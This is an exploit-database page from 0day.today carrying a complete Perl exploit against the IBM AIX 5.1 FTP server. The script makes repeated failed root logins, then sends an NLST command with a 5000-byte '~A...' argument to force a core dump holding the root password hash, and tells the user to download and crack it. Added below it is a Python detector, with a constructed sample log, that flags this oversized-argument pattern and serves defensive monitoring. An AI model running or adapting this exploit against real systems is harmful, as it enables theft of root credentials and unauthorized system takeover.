0day.today - Biggest Exploit Database in the World.
AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
```perl
### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010

use IO::Socket;

$|=1;

print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";

if ($#ARGV < 1) {
    print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
    print "SAMPLES:\n";
    print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
    print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
    exit;
}

$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');

srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;

if ($ARGV[2] eq "") {
    $user = "ftp";
    $pass = "c0deb4b3\@roothash.com";
} else {
    $user = $ARGV[2];
    $passwd = $ARGV[3];
}

$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";

if (fork()) {
    for ($k=0;$k<3;$k++) {
        print "*AIX EXPLOIT* POLLUTING FTPD***\n";
        print "\t$x";
        print $sock "USER root\r\n";
        $x = <$sock>;
        print "\t$x";
        print $sock "PASS sexy\r\n";
        $x = <$sock>;
        print "\t$x";
    }

    print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
    print $sock "USER $user\r\n";
    $x = <$sock>;
    print "\t$x";
    print $sock "PASS $passwd\r\n";
    $x = <$sock>;
    print "\t$x";

    if ($ARGV[2] eq "") {
        print "*AIX EXPLOIT* CWD TO PUB***\n";
        print $sock "CWD pub\r\n";
        $x = <$sock>;
        print "\t$x";
    }

    print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
    $x = <$sock>;
    print "\t$x";

    print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
    print $sock "NLST ~" . "A" x 5000 . "\r\n";
    $x = <$sock>;
    while(<$sock>) {
        print;
    }

    print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
    exit;
} else {
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0",
                                         LocalPort => $port,
                                         Proto     => 'tcp',
                                         Listen    => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    while(<$new_sock>) {
        print $_;
    }
    close($servsock);
}

## CHEERIO!

# 0day.today [2024-07-07] #
```
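A defender-side check for the command sequence this script sends, as an added example that is not part of the original exploit or of the site: it scans an FTP command transcript for sessions that issue an oversized `~`-prefixed NLST/LIST argument and counts the failed root logins seen earlier in the same session. The log format, the 1024-byte threshold and every sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed log format (hypothetical): "<session> C: <client command>" or
# "<session> S: <server reply>". Adapt the regex to your FTP daemon's logs.
LINE = re.compile(r"^(?P<sess>\S+) (?P<dir>[CS]): (?P<text>.*)$")
MAX_ARG = 1024  # assumed threshold, well above any legitimate path argument


def find_suspicious_sessions(lines, max_arg=MAX_ARG):
    """Map session id -> failed root logins and oversized '~' listing arguments."""
    state = defaultdict(lambda: {"user": None, "await_pass": False,
                                 "failed_root_logins": 0, "oversized": []})
    for raw in lines:
        m = LINE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # ignore lines that do not fit the assumed format
        s, text = state[m["sess"]], m["text"]
        if m["dir"] == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s["user"] = arg.strip()
            elif verb == "PASS":
                s["await_pass"] = True  # the next server reply decides success
            elif verb in ("NLST", "LIST") and arg.startswith("~") and len(arg) > max_arg:
                s["oversized"].append((verb, len(arg)))
        elif s["await_pass"]:
            if text.startswith("530") and s["user"] == "root":
                s["failed_root_logins"] += 1
            s["await_pass"] = False
    return {sid: {"failed_root_logins": s["failed_root_logins"], "oversized": s["oversized"]}
            for sid, s in state.items() if s["oversized"]}


def constructed_sample():
    """Constructed transcript: s1 mirrors the sequence in the script on this page, s2 is benign."""
    failed_root = ["s1 C: USER root", "s1 S: 331 Password required for root.",
                   "s1 C: PASS ****", "s1 S: 530 Login incorrect."] * 3
    guest = ["s1 C: USER ftp", "s1 S: 331 Guest login ok.",
             "s1 C: PASS ****", "s1 S: 230 Guest login ok.",
             "s1 C: CWD pub", "s1 S: 250 CWD command successful.",
             "s1 C: NLST ~" + "A" * 5000]
    benign = ["s2 C: USER alice", "s2 S: 331 Password required for alice.",
              "s2 C: PASS ****", "s2 S: 230 User alice logged in.",
              "s2 C: NLST ~alice"]
    return failed_root + guest + benign


if __name__ == "__main__":
    for sid, hit in find_suspicious_sessions(constructed_sample()).items():
        print(sid, hit)
```

A hit on the oversized argument alone is worth alerting on; the failed-root-login count adds context, since the script issues three such attempts before the listing command.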